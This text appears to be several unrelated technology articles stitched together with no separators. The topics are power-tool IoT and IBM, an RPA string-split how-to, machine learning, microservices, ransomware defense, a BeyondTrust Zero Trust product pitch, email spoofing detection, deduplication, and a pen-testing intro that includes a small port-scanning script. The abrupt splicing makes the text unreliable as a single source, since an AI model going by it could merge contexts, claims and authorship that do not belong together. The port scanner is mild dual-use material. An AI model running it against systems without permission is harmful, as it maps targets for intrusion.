Modern power screwdrivers sense the operator’s hand motion and amplify it. These tools react when nudged into action, turning clockwise or counter-clockwise in response to the user’s hand motion. When they are running they light the work area. These tools don’t yet have vision systems of their own and instead depend on the operator’s eye-to-hand coordination for guidance, but smarter screwdrivers with capabilities that resemble those in factory floor robots are on the way. Handheld power screwdrivers use non-slip fast change chucks that accept a wide variety of bits. These tools can not only drive screws, they can also drill and countersink holes or spin nuts onto bolts.
These gadgets are catching on like wildfire, not only because they are so ingeniously engineered but also because they are very inexpensive. Small power screwdrivers can cost as little as $20, although some of the more upscale models can cost close to $100. Even so, these tools are widely viewed as items of immense practical value because they are such amazing time-savers.
When people need more powerful tools they move up a level to cordless, electronically controlled drill/drivers, impact drivers, and hammer drivers. These power tools weigh just a couple pounds apiece and typically cost less than $150 per tool. Nevertheless, they enable home builders to efficiently install framing, mount drywall and put together wooden decks; they quickly pay for themselves. Moreover, the resultant work is far sturdier than comparable work done with hammers and nails. To pick just one simple example, a wooden deck built with nails often warps over time, lifting planks and increasing maintenance costs. The same boards held in place by screws are very unlikely to break loose even though time and weather produce substantial stresses within each plank, putting a lid on repair costs.
To control their motors and manage their use of power, handheld power tools use microprocessors and firmware similar to the technology in mobile communications devices. Like power screwdrivers, drills and drivers have work area lights but lack vision input. But they do have very effective electromechanical drives. All but the least costly power tools made today use light and capable lithium-ion battery packs. Motors on moderately priced tools use brush-and-commutator designs that can be controlled with relatively primitive circuitry. Newer and thus far more costly tools have brushless motors that take advantage of rare earth permanent magnets and very clever switching circuitry to provide quite a bit of torque, very long battery life, and the technical possibility of incorporating load sensors, temperature sensors, rotational velocity sensors, and other smart or self-aware features. The upshot is that a small handheld driver with smart torque management can sink 3-inch lag bolts all day long, if the operator has a spare battery and rapid charger on hand. Moreover, a smart driver using high-tech screws in the hands of a craftsman with decent skills and a bit of experience will hardly ever tear apart a screw head or break the shaft of a fastener.
Today’s tools require manual adjustment of their clutch mechanisms, typically with a ring on the chuck that is a bit like the adjustment ring on a manual camera. But the next step, the centralized and automated setting of tools to match for each phase of a construction project, is just around the corner. The missing elements are jobsite or workshop servers . . . and data radios in the tools. It is possible, even likely, that jobsite local smart tool networks will be based on tablets and communications technologies similar to the ones used in smart home security systems. But right now the situation is in flux.
Technology vendors, including IBM, can get in on the ground floor as construction and workshop technology evolves to plug handhold tools and the craftsmen using them into the Internet of Things. Sure, jobsite automation has a lot in common with factory automation, giving industrial automation suppliers an advantage. But sometimes technology leaps ahead in ways that leave legacy vendors beached while providing new entrants outstanding opportunities. The automation of tools and workshops could rhyme with the way audio entertainment evolved from physical tape distribution to streaming distribution, rapidly shifting the entire business from the Walkman to the iPod.
It looks like there is a huge opportunity about to emerge, but until the Internet of Workshop Things reveals its Steve Jobs and its iPod, nobody can guess what company will be to the IoT what Apple was to personal media players (and much more). When it comes to the advancement of industrial computing, IBM, the Trumpish trumpeter of the Internet of Things, is nowhere to be seen. IBM may be happy to set up offices in snazzy San Francisco or the geek elite’s Kendall Square, but the company just doesn’t seem to be very interested in actually getting any of its employees’ hands dirty. And that is not a good way for IBM to become a live player in the Internet of Things.
Maybe IBM can win some or all of this market by working it top down, providing service backbones to Home Depot, Lowe’s, Tractor Supply, Ace Hardware, and their ilk, possibly finding a way to tap into Harbor Freight.
When it comes to automating workshop tools and tying them into cloud-based systems that can learn procedures and ultimately help the craftsmen using the tools, there is some pretty advanced communication technology already in use when machinists, mechanics, carpenters, and even DIY enthusiasts want to prepare work and later measure the outcome of workshop or factory activities.
Builders routinely use laser-based devices to measure distances, areas and volume and to read angles, ascertaining what is level and what is plumb. Some of these devices can talk to phones, tablets or PCs. Machinists have long since measured distances and sizes with electronic micrometers and calipers that talk to computing devices via USB interfaces, but until recently the only widely available devices were those built by the world’s leaders in metrology, such as Mitutoyo or Fowler. Today, versions of these devices for less demanding applications are cheap enough for the home woodworker or mechanically inclined hobbyist.
So, there seem to be strong indications that networks of tools and instruments, if not the whole Internet of Things, already pretty routine in factories, will soon become a practical aspect of industrial processes carried out in the field, such as homebuilding, and in small workshops, such as auto repair centers. Where there are benefits ranging from improved personnel management to more accurate monitoring of tools and materials, smart and connected devices will appear in the hands of contractors, including solo craftsmen, and ordinary homeowners who wish to take on house and garden maintenance tasks.
To one observer, it looks like the development of this part of the Internet of Things is going to be a bottom-up more than a top-down process. If IBM wants to be a part of it, it can try to win over the planners shaping the future at tool vendors, or perhaps at tool makers like Bosch, Makita or Stanley, but it may also have to find a way to hunker down with the blue-collar folk and their upstream suppliers. It might not be that difficult, even if it seems unlikely. The company's big shots could start by visiting one of their own machine shops to see how IBM's own Things might be Internetted. There isn't a machine shop in white-collar Armonk, but IBM might still have one in what's left of Pokie or maybe Endicott, which aren't all that far away, in case anyone at headquarters actually cares, and in case they haven't yet gotten around to turning off the last of the lights in the old factories.
Using Split action
Use the Split action to split the specified string into multiple strings and store the output in a list variable.
To split a string into multiple strings, perform these steps:
- In the Actions palette, double-click or drag the Split action from the String package.
- In the Source string field, specify the source string.
In the Delimiter field, specify the character on which to split the string.
For example, comma (,), semicolon (;), pipe (|), slash (/ \), newline character (\n), or space.
The delimiter text box does not accept the Enter key as a newline line break. To use a newline as the delimiter, press F2 and select Enter - String from the String section, or enter the $String:Enter$ variable.
In the Delimiter is field, select one of the following options:
- Case sensitive: The delimiter is case-sensitive.
- Not case sensitive: The delimiter is not case-sensitive.
In the Split into substrings field, select one of the following options:
- All possible: Splits the source string into as many substrings as possible. For example, if the original string is a,b,c,d, each character becomes a substring.
- Only: Limits the number of substrings. For example, if the original string is a,b,c,d, and you enter 3, the output is three strings: a, b, and c,d. (The snippet after these steps shows the same behavior in code.)
- In the Assign the output to variable list, specify the list variable.
- Click Save.
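For readers who think in code, the same split semantics can be sketched in Python; the sample string matches the examples above:

```python
import re

source = "a,b,c,d"

# "All possible": split on every occurrence of the delimiter.
print(source.split(","))              # ['a', 'b', 'c', 'd']

# "Only" with 3 substrings: stop after 2 splits, leaving the remainder intact.
print(source.split(",", maxsplit=2))  # ['a', 'b', 'c,d']

# A case-insensitive delimiter, similar to the "Not case sensitive" option.
print(re.split("x", "1x2X3", flags=re.IGNORECASE))  # ['1', '2', '3']
```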
Both machine and deep learning are very hot topics. However, at heart, neither is particularly revolutionary.
Machine learning is essentially about self-training data mining. Data mining algorithms, and the tools (SPSS, SAS, Statistica and so on) to build them, have been around for thirty or forty years. What used to happen was that what we now call a data scientist had a problem to solve, such as making better recommendations or identifying fraud. The data scientist would deploy various data mining algorithms against the problem set, train them (that is, feed them with lots of relevant data), determine which algorithm best suited the problem at hand, and then deploy that model. Best practice meant that, because things like buying patterns change over time, the data scientist would revisit the problem set on a periodic basis to ensure that the chosen algorithm remained the best fit, and either update or replace it as appropriate.
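As a rough sketch of that manual workflow (not taken from any specific vendor's tooling), the snippet below uses scikit-learn, assuming it is installed, to train a few candidate algorithms on an invented problem set and keep whichever scores best under cross-validation:

```python
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from sklearn.tree import DecisionTreeClassifier

# Invented stand-in for the problem set the data scientist is handed.
X, y = make_classification(n_samples=2000, n_features=20, random_state=0)

candidates = {
    "logistic_regression": LogisticRegression(max_iter=1000),
    "decision_tree": DecisionTreeClassifier(random_state=0),
    "random_forest": RandomForestClassifier(n_estimators=100, random_state=0),
}

# Score every candidate the same way and keep the best performer.
scores = {name: cross_val_score(model, X, y, cv=5).mean()
          for name, model in candidates.items()}
best = max(scores, key=scores.get)

print(scores)
print("model to deploy:", best)   # revisit periodically as buying patterns drift
```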
What machine learning does is automate the process of improving the existing deployed algorithm. Best practice still means periodically checking that this is the best algorithm for the job, but it no longer requires checking that the algorithm is performing optimally.
From a business perspective this is very important. It means that recommendation engines gradually get better over time. It means that false positives and false negatives (whether in fraud detection or other environments such as name and address matching) incrementally improve.
Deep learning, in effect, goes one step further, by automating the process of creating the best algorithm for the task in hand. This doesn't actually do anything directly for the business that machine learning does not: for example, it does not reduce the rate of false positives any more than a well-designed machine learning algorithm might do. What it does do is to remove the need to develop and test multiple algorithms to see which is the best fit against the problem dataset. In other words, to a large extent it removes the data scientist from the equation. Taken to its logical conclusion this means that deep learning will ultimately automate the role of the data scientist out of existence.
The study of philosophy, at least in the past, has involved asking questions that seem, on the surface, to be, well, irrelevant. After all, is it really all that important to know “whether a ship that had been restored by replacing every single wooden part” remains the same ship? That’s the question Plutarch asked in Life of Theseus and thereafter became known as Theseus’ paradox. More generally stated, it asks “whether an object that has had all of its components replaced remains fundamentally the same object.” (Ship of Theseus, Wikipedia)
We might ask the same thing of microservices which, when applied to existing monolithic applications, seeks to essentially restore the application by replacing functions with complementary services. Functions are small (or should be), by design, and thus the term "micro" is applied to the resulting, decoupled services. The differences between the two can be viewed in terms of communication. In a monolithic application, functions are invoked by referencing a specific address in memory. In a microservices-based application, functions (services) are invoked by referencing a specific IP address in the network.
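A minimal sketch of that difference might look like the following, where the service name, port, and path are invented for illustration and the requests library stands in for whatever HTTP client is actually used:

```python
import requests  # third-party HTTP client, used here only for illustration

# Monolith: the function lives in the same process and is invoked through a
# plain in-memory call.
def recommendations(user_id):
    return ["item-1", "item-2"]

local_result = recommendations(42)

# Microservice: the same capability sits behind a network address and is
# invoked over HTTP against a hypothetical internal service.
remote_result = requests.get(
    "http://recommendations.internal:8080/users/42/recommendations",
    timeout=2,
).json()
```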
Conceptually, the two are the same, with only the mechanism for invocation of individual functional components differing. A resulting diagram would show essentially little difference except that the monolith's "box" is a single server and the microservices' "box" is the entire data center. One uses localized addressing, the other network addressing. The code for each of these functions could be exactly the same, just like the wood in Theseus' ship.
But its business functions remain consistent and, in fact, if we’ve properly decomposed the application the user should see no discernable difference between the two. One could argue that from the perspective of the passenger on Theseus’ ship, there is no difference between the two. Nor should there be.
But philosophers tend to dig deeper, and, like them, so must we, because the difference between a monolithic application and a microservices-based one are, in fact, quite important to operations.
Microservices simplifies many aspects of the application development process but in doing so creates a great deal of operational complexity. The number of network connections between the disparate parts of a microservices-based application necessarily requires associated overhead in managing the various network characteristics involved: IP addresses, VLANs, NAT tables, and more. Scalability, too, becomes a challenge that even Dijkstra might find frustrating, as placement of the microservices and the load balancing service has a very real impact on performance based on how many segments in the network must be traversed.
Additional policies are suddenly required, for the security policies applicable to one service that directly accesses a sensitive data source are not those that are necessary to secure another service that manages preferences or session state. The resulting web of micro-security policies certainly provides many of the same benefits as microservices themselves, that is, finer-grained control and a kind of elegant simplicity, but at the same time becomes an operational nightmare as policies must suddenly move with services, wherever they might pop up in the architecture.
Deployment, too, suddenly becomes exponentially more difficult, like moving from a simple box-step dance to the more complicated Flamenco, with many more steps and a lot more movement across the dance floor (data center). Orchestration and automation become a requirement to ensure the consistency and predictability necessary to move all the pieces into place at the right time.
Those responsible for providing these network and security services for applications need to recognize that the ship is not the same, no matter what the fifty-thousand-foot view may suggest. It sounds simple; one application is simply replaced by ten services. Voila! The app has been recreated, just like Theseus' ship. But from the operational perspective this ship is not the same at all. The joins (integration) in the new ship are completely different, which can change the friction created against the sea (network) and tend to cause the ship to sail more slowly.
Microservices are still emergent. They aren't taking over the world (yet) but it's important to recognize that it isn't as simple a matter as tearing down Theseus' ship and rebuilding it. Network and security service operations teams must take the philosopher's view rather than the passenger (user) view because the impact on the network and on security is very, very different.
Ransomware is a specific type of malicious software (aka malware) that locks up your devices or an organization’s data in order to ransom that access back to you – sometimes to the tune of millions of dollars. Computers lock up, data disappears, or files become encrypted with no way to recover them. The hacker will then contact their victim to issue conditions for payment to retrieve access. Not only has this cost many businesses millions of dollars, but there is never a real guarantee that paying the ransom will get you back your access. For this reason, law enforcement agencies don’t recommend paying it, but many companies do so anyway.
The big question of the day is how should organizations protect themselves against these targeted attacks? What is the best solution for preventing a ransomware attack? And, if you become a victim, how should you respond? Fortunately, while there is no way to defend against these malicious attacks completely, there is a way to build layers of defense into your cybersecurity strategy to mitigate the fallout of an infiltration.
Ransomware Attack Vectors
Verizon's 2022 Data Breach Investigations Report (DBIR) highlights four key paths to breaches believed to contribute to ransomware invasions: botnets, exploitation of an organization's system vulnerabilities, phishing, and stolen credentials.
Botnets are a network of computers that have been hijacked with malware. The hacker gains the ability to remotely control a victim’s network to do things like mine cryptocurrency or send spam. These can also be leveraged to launch a ransomware attack when different cybercriminals partner up to compromise a system.
System vulnerabilities are technical issues that can lead to attacks. While these kinds of breaches have doubled in the last year, they make up only 7% of successful data breaches. This vector includes bugs in your product, firewall issues, and unpatched system exploits. Third-party vendors, partners, and supply chains can also leave organizations vulnerable.
Phishing is the attack vector most likely to be used to infiltrate a user's system, along with hacking to hijack system passwords. Phishing scams are becoming incredibly sophisticated, so even the savviest users fall into this trap. According to the DBIR, 35% of ransomware incidents involve the use of email.
However, of all the methods, stealing credentials via simple hacking methods is still one of the simplest and most direct ways to penetrate an organization’s security. Too many users rely on weak passwords – the most common security vulnerability – to protect their accounts. In 2019, weak passwords caused 30% of ransomware infections, and it’s still a major problem for organizations in 2022.
Weak Passwords and Ransomware: A Perfect Pair
Criminals know quite a few methods to steal your credentials, from dictionary attacks to password spraying. And weak passwords are the driving force behind the success of these attacks. When users create passwords that hackers have already exposed in previous data breaches or with common words, combinations, and phrases, threat actors can use relatively easy methods like credential stuffing and password spraying to crack an account. It’s a numbers game that favors the assailant.
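One common countermeasure is to refuse passwords that are short or already known to attackers. The sketch below is illustrative only; the wordlist path is a hypothetical stand-in for a real corpus of breached passwords:

```python
# Reject a new password that is too short or appears in a list of passwords
# exposed in earlier breaches ("breached-passwords.txt" is a stand-in path).
def load_breached_passwords(path="breached-passwords.txt"):
    with open(path, encoding="utf-8") as handle:
        return {line.strip().lower() for line in handle}

def is_acceptable(candidate, breached):
    return len(candidate) >= 12 and candidate.lower() not in breached

breached = load_breached_passwords()
print(is_acceptable("Summer2022!", breached))          # False: too short, common pattern
print(is_acceptable("crate-otter-lamp-41", breached))  # True unless it appears in the list
```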
When passwords are created with these weaknesses, even encrypting passwords isn’t enough to prevent an attack. Advanced security measures just aren’t enough to protect your networks and systems if your employees and users aren’t building strong, unique, and uncompromised passwords. Unfortunately, this leaves too many organizations with a false sense of security regarding their susceptibility to a ransomware incident.
When hackers infiltrate an organization this way, it’s simple to log in and download malware that will interfere with data backups, encrypt system access, or even spread malignant code to other devices connected to the network.
So, You’re the Victim of a Ransomware Attack: What Now?
Ransomware response can vary greatly depending on your business. Experts recommend shutting down your network to stop the spread of malware once you become aware of an event. Disconnect all devices known to be infected, and consider disabling network connections. Before restoring anything from a backup, you need to ensure that your backups haven’t been compromised too. Employ a clean network to reinstall the OS, and run trusted antivirus software. And always remember that paying a ransom to get your critical business systems back online as fast as possible might be tempting, but it could end up netting you nothing in return. More information can be found in the NCSC guide: Technical Approaches to Uncovering and Remediating Malicious Activity.
Taking the Initiative to Prevent a Payout
According to the DBIR, ransomware attacks are rising rapidly. They make up 25% of total breaches and have increased 13% over the previous year. This surge is greater than the last five years combined. Criminals have discovered that ransomware attacks can net significant profit and are accelerating their efforts to penetrate more businesses and industries worldwide.
The best course of action you can take now is to implement and reinforce a layered defensive strategy before a threat actor comes for your systems. This means being proactive by taking steps like scheduling regular backups for your most important files, practicing good password hygiene, and promoting a cybersecure culture across your organization. Ransomware is a complex problem that is only getting worse as criminals get more creative. Businesses need to address every threat vector and build out multiple safeguards on different fronts to be ready in the event of a ransomware attack. We all need to do our part to stop cybercriminals from profiting from gaps in our security.
What is Zero Trust?
The simplest description of Zero Trust is that nothing in a network environment should be trusted until it is validated against a list of known values. This means users, systems, and processes are all validated prior to any action being authorized, whether that is a login (access), an automated process, or a privileged activity (authorization).
Using this approach, nothing in the network is assumed to be trustworthy until it has been verified. Even when a process or command is validated, strong controls are put in place to ensure that any potentially damaging activities are tightly restricted to limit possible damage to revenue generating systems.
Cyberwarfare differs from the traditional warfare models that most people understand in one significant way – it is entirely defensive in nature, and there are no offensive capabilities in a corporate environment. Unfortunately, within the realm of legality, the only option for corporations is to be able to withstand an attack from an external adversary. Developing defensive strategies, and monitoring the perimeter of the network are literally the first line of defense in the protection of a corporate network. The Zero Trust model brings a lot of focus to the potential that something, or someone within the network perimeter has been compromised. This has often been overlooked in most cyber-defense strategies because the focus has been on external threats, and the assumption has been that the internal network is safe and trustworthy.
Corporate network environments have traditionally been built with the idea of securing an external perimeter against penetration from external sources. Although this is a good starting point, it does little or nothing to secure an environment from an internal threat. Nobody likes to think that someone inside their network would do something to cause a security compromise, whether inadvertently, or deliberately, but common-sense dictates that this must be considered in a healthy security program.
It is important that the reality of an internal threat be confronted directly in a security program. Although every effort is made to ensure that users are thoroughly vetted during the hiring process, seldom do programs account for changes once the initial background checks are run, or baseline scans are run on servers.
Originally proposed in 2010, the Zero Trust security model in its purest form has largely been determined to be impractical in most customer environments. Discussions related to implementing this model are often heated, and tend to devolve to an ‘all or nothing’ disagreement over whether it should, or can, be practically implemented in a corporate environment.
BeyondTrust products support the practical and intelligent implementation of elements of a Zero Trust security model in corporate networks using pieces that make sense but don’t hamper productivity. This hybrid approach provides companies with the ability to select the parts of the Zero Trust model that make sense to implement in their environment with a common-sense approach toward long-term security. Ultimately, the goal of any corporate computing network is to assist with revenue generation, so implementing controls that don’t interfere with that goal is important to the bottom line.
BeyondTrust and “Zero Trust”
The key to implementing elements of Zero Trust within a corporate network is to concentrate on controls that restrict access from point to point within the network environment, and detect unusual activity rapidly. Restricting lateral movement within the network, or the ability to move from point to point once access is granted is key to this strategy. BeyondTrust products offer the ability to help in this area.
PowerBroker Password Safe (PBPS)
PowerBroker Password Safe helps discover and secure login credentials on all servers and network devices within a customer environment. In addition, discovery scanning can assist with detecting and securing newly provisioned identities on servers. Using the strong controls that authorize access to specific servers, or credentials, and scheduling capabilities, it is possible to secure servers from unauthorized access. Some of the key features that are standard in PBPS that will help to control access within an environment are:
- Access control may be limited to specific servers, or groups of servers using SmartGroup technology
- Access control may be restricted to certain times and this can be aligned to user schedules, or server maintenance windows
- Integration with major ticketing systems to validate whether an activity is authorized to take place
- Integration with identity governance (IGA) products such as Sailpoint to validate user roles and enforce role based access controls within the network
- Full Active Directory integration to validate user credentials
- Multi-Factor Authentication (MFA) is built in to the product and works with any RADIUS-based MFA product
- Fully configurable password rules to ensure that strong passwords are enforced on all servers and for all credentials that are managed
- Scheduled password rotation features ensure that passwords are changed regularly, and also after each use
- Included API access for automation processes to prevent having to store credentials in scripts or in other insecure sources within the network
Retina Vulnerability Management
Retina helps discover and scan assets for vulnerabilities within an environment. Applying a regular scanning schedule provides an internal and external view of the health of a customer environment.
- Regular updates provide the ability to scan for the most recent vulnerabilities usually shortly after they are identified
- Compliance and regulatory reports are available to meet most global security reporting requirements
- External scanning is available to ensure the security of the perimeter, and is often required by regulations such as PCI/DSS
- Internal scanning can constantly monitor the health of assets on a regular schedule, and reporting is integrated to bring uncharacteristic items, or discovered vulnerabilities immediately to the attention of those responsible for correcting them
PowerBroker for Unix & Linux (PBUL)
PowerBroker for Unix & Linux is an agent-based solution that provides absolute control over activity on Unix and Linux operating systems. It is expected that Unix and Linux servers will comprise nearly 85% of all servers in corporate environments over the next several years. Most cloud services offer low-cost Linux servers primarily, and due to the open source software model of the Linux operating system, it is a cost-effective solution for most enterprises. Developing strong controls over users and activity will be crucial to deliver peace of mind. Some of the key features that have been implemented in customer environments and that provide advanced levels of control and support the Zero Trust model are:
- Full control over all identities on servers, and the ability to execute processes as any identity with access to the server using a trusted agent model
- Built-in policy language that permits complete access to, and control of the remote client operating system, policy server operating system, and with complete access to external data sources for validation
- Server information can be validated prior to authorization of any privileged activity – this is the essence of Zero Trust
- External sources can be queried to gather detailed information to confirm activities fall within the spectrum of those that are authorized
- Full control over policy server operating systems in a tamper-proof manner which provides a secure source of validation to validate secondary information
- Using the policy language, virtually any command or process that is within the capability of the operating system can be performed
- Advanced Control and Audit (ACA) features that permit the restriction of commands even within a privileged session where they may otherwise be authorized
- Full event logging of all activities that are authorized, or attempted
- Configurable keystroke and IO session logs provide irrefutable evidence of all activity that takes place within an authorized privileged access session
- Advanced policy controls permit strong access controls over servers, and sessions can be initiated using non-standard ports in very secure environments
- Privileged activities can be declined when outside of scheduled server maintenance windows, or outside user working hours
- Advanced features that permit validation of binaries, and permissions on commands prior to authorization to ensure that they are authorized
- Using trusted agent technology, it is possible to collect data from client systems to monitor for changes in server configurations, additional user ids, or other characteristics to compliment other tools in the environment
PowerBroker for Networks (PBN)
PowerBroker for Networks is designed to provide strong control over network devices where other tools cannot be installed. Typically, network devices provide little or no control over user activities once access is gained. Using PBN, it is possible to strictly validate all activity prior to execution.
- Enabling administrators to perform all of the tasks necessary to complete their jobs, while enforcing least privilege on activity.
- Using flexible policy language to dynamically query other data sources that are available in a customer environment to make policy decisions. Additional factors may include information such as:
- Job title
- Job role
- Geographic location
- Permits integration with ticketing systems to determine whether an activity is authorized
- Provide a detailed, irrefutable audit trail for all authorized activities
- Generate actionable alerts based on detected misuse
- Full session IO log recording of all privileged activities
- Comprehensive coverage of devices on which there is little or no visibility currently
- Industry leading audit reporting to reduce the cost of audit, and to enforce compliance of policies and standards in the network environment
- Role based access controls that confine activity for teams and groups to only that which is authorized
PowerBroker for Windows (PBW)
PowerBroker for Windows provides strong control over Windows operating systems on both servers and desktops. This level of granular control over program execution delivers complete control over user activity and can transparently authorize privileged or administrative activity using user group or role membership.
- Improve security with user-based rules and policy
- Control when and how rules are applied
- Improve efficiency by tracking trusted sources
- Enforce complete endpoint least privilege
- Reveals privileged application and asset security risks
- Ensure complete application control
- Reduce attack surfaces by removing admin rights from end users and employing fine-grained policy controls for all privileged access, without disrupting productivity
- Monitor and audit sessions and user activity for unauthorized access and/or changes to files and directories
- Analyze behavior to detect suspicious user, account and asset activity
- Enforce least privilege for desktops and servers
- Eliminate admin rights: prevent abuse or misuse of privileges on Windows assets
- Ensure productivity: default all users to standard privileges, while enabling elevated privileges for specific applications and tasks without requiring administrative credentials
- Allow admin where needed: proactively identify applications and tasks that require administrator privileges — and automatically generate rules for privilege elevation
- Elevate applications: elevate application as logged on or another user, without exposing credentials
BeyondInsight, the PowerBroker Privileged Access Management Platform
The PowerBroker Privileged Access Management Platform is a central interface that provides a dashboard view of activity within the network. This interface takes input from all available sources and builds a risk profile for servers, and users to baseline standard behavior. The more products that report into the console, and the larger the data set, the better the analytics. The analytics console looks at user behavior and baseline characteristics of activity, and can report when suspicious user, account, or asset activity takes place.
Practical Application of Zero Trust
Combining all of the elements of the above products, it is possible to enforce the best elements of a Zero Trust model in any corporate environment without disrupting business processes. Zero Trust is really about knowing who is doing what within your network, and making sure that in the event that something uncharacteristic happens you have the ability to respond to control or limit any threats to the network.
As a corporate information security program matures, it is possible to intelligently apply stronger controls over activity in an environment. Shifting the focus from looking at external threats primarily to take a holistic view of both internal and external activity provides a new level of protection to a corporate network. Setting aside the tradition of securing the perimeter and trusting everything internal is the first step toward implementing a Zero Trust model. Combining many risk factors, such as server maintenance windows, user work schedules, point of origin, and behavior monitoring, it is possible to achieve most aspects of Zero Trust without implementing draconian controls that would hamper creativity.
BeyondTrust is happy to help customers who have a desire to rationally implement these elements into their security program. Please contact us for further information, and to consult on how this can be approached in your environment based on your use cases and situation.
Chad Erbe, Professional Services Architect, BeyondTrust
Chad Erbe is a Certified Information Systems Security Professional (CISSP), with nearly 30 years' experience in a Unix/Linux administration role. Chad has worked in DoD high-security environments, manufacturing, and with large financial services companies throughout his career. This broad experience has led him to an architectural role with BeyondTrust where he focuses on Privileged Access Management, particularly in the Unix suite of products. Chad also maintains his PCI ASV certification from the PCI Council.
Email Spoofing Explained
What is email spoofing?
The word spoof means falsified. A spoofed email is when the sender purposely alters parts of the email to make the message appear as though it was authored by someone else. Commonly, the sender's name/address and the body of the message are formatted to appear to come from a legitimate source. Sometimes, the spoofer will make the email appear to come from a private citizen somewhere.
A spoofed message can appear to be sent from a coworker, a bank, a family member or any number of seemingly trustworthy sources. A good spoof will look like any other email that you would normally receive.
Warning: If you suspect you have received a fraudulent message DO NOT click any link in the message or enter any information that is requested.
Why do people spoof email?
In many cases, the spoofed email is part of a phishing (scam) attack. In other cases, a spoofed email is used to dishonestly market an online service or sell you a bogus product. The intent is to trick the recipient into making a damaging statement or releasing sensitive information, such as passwords. If you're receiving bounced (returned) emails for messages that you never sent, this could be a case of spoofing.
Identify a spoofed message
It is vital that users understand that emails that appear to be sent from co-workers can possibly be forged.
Scammers will alter different sections of an email to disguise who the actual sender of the message is. To identify the following examples you will need to open the email headers of a message you suspect has been spoofed. Examples of properties that are spoofed:
FROM email@example.com (This will appear to come from a legitimate source on any spoofed message)
REPLY-TO This can also be spoofed, but a lazy scammer will leave the actual REPLY-TO address. If you see a different sending address here, the email may have been spoofed.
RETURN-PATH This can also be spoofed, but a lazy scammer will leave the actual RETURN-PATH address. If you see a different sending address here, the email may have been spoofed.
SOURCE IP address or “X-ORIGIN” address. This is typically more difficult to alter but it is possible.
These first three properties can be easily altered by using settings in your Microsoft Outlook, Gmail, Hotmail, or other email software. The fourth property above, IP address, can also be altered, but usually requires more sophisticated user knowledge to make a false IP address convincing.
In this example, it appears that the recipient has received a message from their office assistant, requesting money. The subject line should alert you immediately. This user should contact their assistant through another form of communication to confirm that they did not send this message. Next, you will want to discover who actually sent the message by opening the message headers.
In this message header snippet, we see that the From: field shows the message being sent from "Assistant" firstname.lastname@example.org. However, we can also see that the REPLY-TO: field lists email@example.com. That is a clear-cut example of a spoofed message. You will want to blacklist any address you find in the REPLY-TO and SOURCE IP fields that is not an address/IP you normally receive mail from.
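That manual inspection can also be scripted. The sketch below uses Python's standard email module to flag a message whose Reply-To or Return-Path address differs from the From address; bear in mind that some legitimate mail (mailing lists, send-on-behalf services) produces the same mismatch, so treat it as a signal rather than proof:

```python
from email import message_from_string
from email.utils import parseaddr

def reply_to_mismatches(raw_message):
    """Return headers whose address differs from the From address."""
    msg = message_from_string(raw_message)
    _, from_addr = parseaddr(msg.get("From", ""))
    suspicious = []
    for header in ("Reply-To", "Return-Path"):
        _, addr = parseaddr(msg.get(header, ""))
        if addr and addr.lower() != from_addr.lower():
            suspicious.append((header, addr))
    return suspicious

raw = (
    "From: Assistant <firstname.lastname@example.org>\n"
    "Reply-To: email@example.com\n"
    "Subject: Urgent wire transfer\n"
    "\n"
    "Please send funds today."
)
print(reply_to_mismatches(raw))   # [('Reply-To', 'email@example.com')]
```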
User education is the first line of defense against these types of attacks. If a user receives a spoofed message:
- Blacklist any address/IP listed in the REPLY-TO, RETURN-PATH, or SOURCE IP that you have determined to be fraudulent.
- DO NOT click on any links contained in the suspect message.
- Immediately change your password if you or your users provided that information at any point.
- Alert the rest of your business to the situation.
Spoofing is possibly the most frustrating abuse issue to deal with, simply because it cannot be stopped. Spoofing is similar to hand-writing many letters, and signing someone else's name to it. You can imagine how difficult that would be to trace.
How can deduplication help your organization save space?
Deduplication is a data reduction practice that methodically inspects data at the sub-file level and replaces any redundant elements with reference pointers. Deduplication decreases the disk space needed to store data by 90% or more when compared to traditional disk systems.
Working at a sub-file level is more powerful than looking at entire files.
In reality, there’s usually only one part of a file that actually changes, not the entire file. Since data deduplication works at the sub-file level, it can store only unique data. There are a few possible approaches offered – using a variable-length block system to find redundancy is the most common.
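To make the idea concrete, here is a toy sketch of sub-file deduplication. It uses fixed-size blocks purely to keep the code short; as noted above, production systems generally prefer a variable-length block system to find redundancy:

```python
import hashlib

chunk_store = {}   # hash -> chunk bytes; each unique chunk is stored once

def store_file(data, chunk_size=4096):
    """Store a file as a list of pointers (hashes) into the chunk store."""
    pointers = []
    for i in range(0, len(data), chunk_size):
        chunk = data[i:i + chunk_size]
        digest = hashlib.sha256(chunk).hexdigest()
        chunk_store.setdefault(digest, chunk)   # skip chunks already present
        pointers.append(digest)
    return pointers

original = b"A" * 8192 + b"B" * 4096
edited   = b"A" * 8192 + b"C" * 4096   # only the last block changed

store_file(original)
store_file(edited)
print(len(chunk_store))   # 3 unique chunks kept instead of the 6 blocks written
```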
It can make a big difference whether you carry out de-duplication at the source or at the target.
Source de-duplication happens on the client or backup server as a function of the backup software. While it can cut out some network requirements, it takes up CPU cycles on host servers during the backup process, which can slow down backup and interfere with primary applications. These drawbacks make source de-duplication ideal for smaller systems, but not for bigger systems.
Target de-duplication normally gives a faster ingest, shorter backup window, and a faster turnaround for disaster recovery processes. It can also allow a single device to support different backup applications. Overall, target de-duplication is the preferred choice for larger systems.
You need to pay attention to when you de-duplicate.
If you choose to de-duplicate during ingest, you'll use less disk but the overhead can negatively affect the backup window. If the vendor provides an adaptive buffering approach, this problem can be avoided. De-duplicating after the ingest gives faster backups, but you'll need to reserve the disk as a landing area.
Identify Vulnerable Assets to Strengthen Your Security Defenses
A penetration test, also known as a pen test, is a simulated cyber attack against your computer system to check for exploitable vulnerabilities. The goal of a pen test is to determine whether unauthorized access to key systems and files can be achieved. It approaches a network from the outside in order to gather intelligence and provide detailed reports that identify all threats. This includes testing firewalls, scanning open ports, and performing Secure Shell (SSH) testing to find all network vulnerabilities.
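As a drastically simplified illustration of the open-port scanning step (to be run only against systems you are authorized to test), a basic TCP connect check might look like this:

```python
import socket

def open_ports(host, ports, timeout=1.0):
    """Return the subset of ports that accept a TCP connection."""
    found = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            if sock.connect_ex((host, port)) == 0:   # 0 means the connect succeeded
                found.append(port)
    return found

print(open_ports("127.0.0.1", [22, 80, 443, 3389]))
```

Real engagements use far more capable tooling, but the principle is the same: every listening service is a potential entry point that needs to be accounted for.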
